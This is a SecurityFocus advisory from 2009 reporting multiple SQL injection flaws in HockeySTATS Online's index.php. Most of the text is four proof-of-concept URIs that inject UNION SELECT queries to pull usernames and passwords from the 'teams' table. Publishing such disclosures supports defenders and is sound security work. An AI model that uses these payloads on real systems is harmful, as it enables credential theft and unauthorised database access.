Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:
www.example.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
www.example.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
www.example.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
www.example.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*







 

Privacy Statement
Copyright 2009, SecurityFocus